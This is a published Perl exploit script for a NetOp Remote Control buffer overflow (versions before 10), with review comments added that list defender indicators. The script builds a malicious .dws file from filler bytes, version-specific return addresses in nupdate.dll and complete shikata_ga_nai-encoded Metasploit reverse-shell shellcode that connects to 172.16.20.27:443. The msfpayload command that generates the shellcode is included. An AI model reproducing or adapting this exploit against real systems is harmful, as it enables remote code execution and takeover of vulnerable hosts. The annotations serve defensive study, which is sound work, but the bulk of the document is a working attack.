# Exploit Title: NetOp Remote Control Buffer Overflow
# Date: April 28, 2011
# Author: chap0
# Version: 8.0, 9.1, 9.2, 9.5 (Possibly anything before ver 10)
# Upgrade to Version 10 for fix
# Tested on: Windows XP SP3
#
# Greetz to JJ IE by day Ninja by night, br34dcrumb5, myne-us, Exploit-DB, Corelan
#
#
#!/usr/bin/perl
#
# NOTE(review): Proof-of-concept file generator, preserved as published (the
# shebang above is not on line 1, so it is treated as a comment; the script is
# run as `perl <file>`). The script has no network side effects of its own: it
# writes one crafted .dws file into the current directory. The overflow would
# presumably fire when a vulnerable NetOp build (< 10, per the header) parses
# that file -- the trigger path is not shown here. The vendor fix is the
# version 10 upgrade named in the header.
#
# Notes for defenders (grounded in the values below):
#   - The written file is 524 bytes of 0x41, a 4-byte address, 20 more bytes
#     of 0x41, then 341 bytes of encoded payload (889 bytes in total). A .dws
#     file containing a long run of 0x41 followed by high-entropy data is a
#     simple static indicator.
#   - Per the generator comment below, the payload is a reverse TCP shell to
#     172.16.20.27:443, a private (RFC 1918) address, so as published it can
#     only connect within a local network. An outbound TCP connection to port
#     443 originating from the NetOp process is the network-side indicator.
#   - The return addresses are fixed offsets into nupdate.dll, so they only
#     work while that module loads at a fixed base (as on XP SP3); rebasing or
#     ASLR of that module defeats this particular sample.

# Output filenames, one per targeted NetOp version. These are package globals;
# the script does not `use strict`.
$file0 = "netop80.dws";
$file1 = "netop91.dws";
$file2 = "netop92.dws";
$file3 = "netop95.dws";

# 524 bytes of filler; the 4 bytes that follow it land on the saved return
# address (inferred from the payload layout junk . ret . extra . shellcode).
my $junk="\x41" x 524;

# Little-endian encodings of the addresses in the trailing comments. Each
# version gets its own address, which is why the sample is build-specific.
my $ret0 = "\x9B\xC2\x40\x20"; #0x2040C29B [nupdate.dll]
my $ret1 = "\xB3\xE9\x3D\x20"; #0x203DE9B3 [nupdate.dll]
my $ret2 = "\x1B\xFC\x44\x20"; #0x2044FC1B [nupdate.dll]
my $ret3 = "\x13\x26\xB5\x20"; #0x20B52613 [nupdate.dll]

# 20 more filler bytes between the return address and the payload.
my $extra = "\x41" x 20;

# Payload as emitted by the Metasploit tooling named below (windows/shell_reverse_tcp,
# shikata_ga_nai-encoded to avoid 0x00/0x0a/0x0d). 24 lines of 14 bytes plus a
# final 5-byte line = 341 bytes, matching the reported size.
#./msfpayload windows/shell_reverse_tcp LHOST=172.16.20.27 LPORT=443 R | msfencode -a x86 -b '\x00\x0a\x0d' -t perl
#[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
my $shellcode= "\xb8\x34\xc1\xf5\xcc\xdb\xd1\xd9\x74\x24\xf4\x5a\x33\xc9" .
"\xb1\x4f\x31\x42\x14\x03\x42\x14\x83\xc2\x04\xd6\x34\x09" .
"\x24\x9f\xb7\xf2\xb5\xff\x3e\x17\x84\x2d\x24\x53\xb5\xe1" .
"\x2e\x31\x36\x8a\x63\xa2\xcd\xfe\xab\xc5\x66\xb4\x8d\xe8" .
"\x77\x79\x12\xa6\xb4\x18\xee\xb5\xe8\xfa\xcf\x75\xfd\xfb" .
"\x08\x6b\x0e\xa9\xc1\xe7\xbd\x5d\x65\xb5\x7d\x5c\xa9\xb1" .
"\x3e\x26\xcc\x06\xca\x9c\xcf\x56\x63\xab\x98\x4e\x0f\xf3" .
"\x38\x6e\xdc\xe0\x05\x39\x69\xd2\xfe\xb8\xbb\x2b\xfe\x8a" .
"\x83\xe7\xc1\x22\x0e\xf6\x06\x84\xf1\x8d\x7c\xf6\x8c\x95" .
"\x46\x84\x4a\x10\x5b\x2e\x18\x82\xbf\xce\xcd\x54\x4b\xdc" .
"\xba\x13\x13\xc1\x3d\xf0\x2f\xfd\xb6\xf7\xff\x77\x8c\xd3" .
"\xdb\xdc\x56\x7a\x7d\xb9\x39\x83\x9d\x65\xe5\x21\xd5\x84" .
"\xf2\x53\xb4\xc0\x37\x69\x47\x11\x50\xfa\x34\x23\xff\x50" .
"\xd3\x0f\x88\x7e\x24\x6f\xa3\xc6\xba\x8e\x4c\x36\x92\x54" .
"\x18\x66\x8c\x7d\x21\xed\x4c\x81\xf4\xa1\x1c\x2d\xa7\x01" .
"\xcd\x8d\x17\xe9\x07\x02\x47\x09\x28\xc8\xfe\x0e\xbf\x5f" .
"\x10\x84\x5b\xc8\x13\xa4\x5a\xb3\x9d\x42\x36\xd3\xcb\xdd" .
"\xaf\x4a\x56\x95\x4e\x92\x4c\x3d\xf2\x01\x0b\xbd\x7d\x3a" .
"\x84\xea\x2a\x8c\xdd\x7e\xc7\xb7\x77\x9c\x1a\x21\xbf\x24" .
"\xc1\x92\x3e\xa5\x84\xaf\x64\xb5\x50\x2f\x21\xe1\x0c\x66" .
"\xff\x5f\xeb\xd0\xb1\x09\xa5\x8f\x1b\xdd\x30\xfc\x9b\x9b" .
"\x3c\x29\x6a\x43\x8c\x84\x2b\x7c\x21\x41\xbc\x05\x5f\xf1" .
"\x43\xdc\xdb\x01\x0e\x7c\x4d\x8a\xd7\x15\xcf\xd7\xe7\xc0" .
"\x0c\xee\x6b\xe0\xec\x15\x73\x81\xe9\x52\x33\x7a\x80\xcb" .
"\xd6\x7c\x37\xeb\xf2";

# Interactive menu. The heredoc below is runtime output; line breaks were
# restored from a collapsed copy and may not match the original exactly.
print<<EOF;
NetOp Remote Control Buffer Overflow
By chap0 - www.seek-truth.net
Choose a number for the version of NetOp are you attacking:
0 - NetOp 8.0
1 - NetOp 9.1
2 - NetOp 9.2
3 - Netop 9.5
EOF
print "Selection: ";
chomp ($select = <STDIN>);

# NOTE: `=~` with a bare number is a pattern match against the stringified
# digit, not numeric equality, so any input containing that digit takes the
# first matching branch; the final `=~ ''` (empty pattern) matches whatever
# is left and prints the prompt. Each branch uses a two-argument, unchecked
# open: the filename is a literal so there is no mode injection, but a failed
# write is silent.
if ($select =~ 0) {
print "Creating payload for NetOp 8.0\n";
my $payload=$junk.$ret0.$extra.$shellcode;
open(FILE,">$file0");
print FILE $payload;
close(FILE);
print "Done.\n";
}
elsif ($select =~ 1) {
print "Creating payload for NetOp 9.1\n";
my $payload=$junk.$ret1.$extra.$shellcode;
open(FILE,">$file1");
print FILE $payload;
close(FILE);
print "Done.\n";
}
elsif ($select =~ 2) {
print "Creating payload for NetOp 9.2\n";
my $payload=$junk.$ret2.$extra.$shellcode;
open(FILE,">$file2");
print FILE $payload;
close(FILE);
print "Done.\n";
}
elsif ($select =~ 3) {
print "Creating payload for NetOp 9.5\n";
my $payload=$junk.$ret3.$extra.$shellcode;
open(FILE,">$file3");
print FILE $payload;
close(FILE);
print "Done.\n";
}
elsif ($select =~ '') {
print "Please make a selection.\n";
}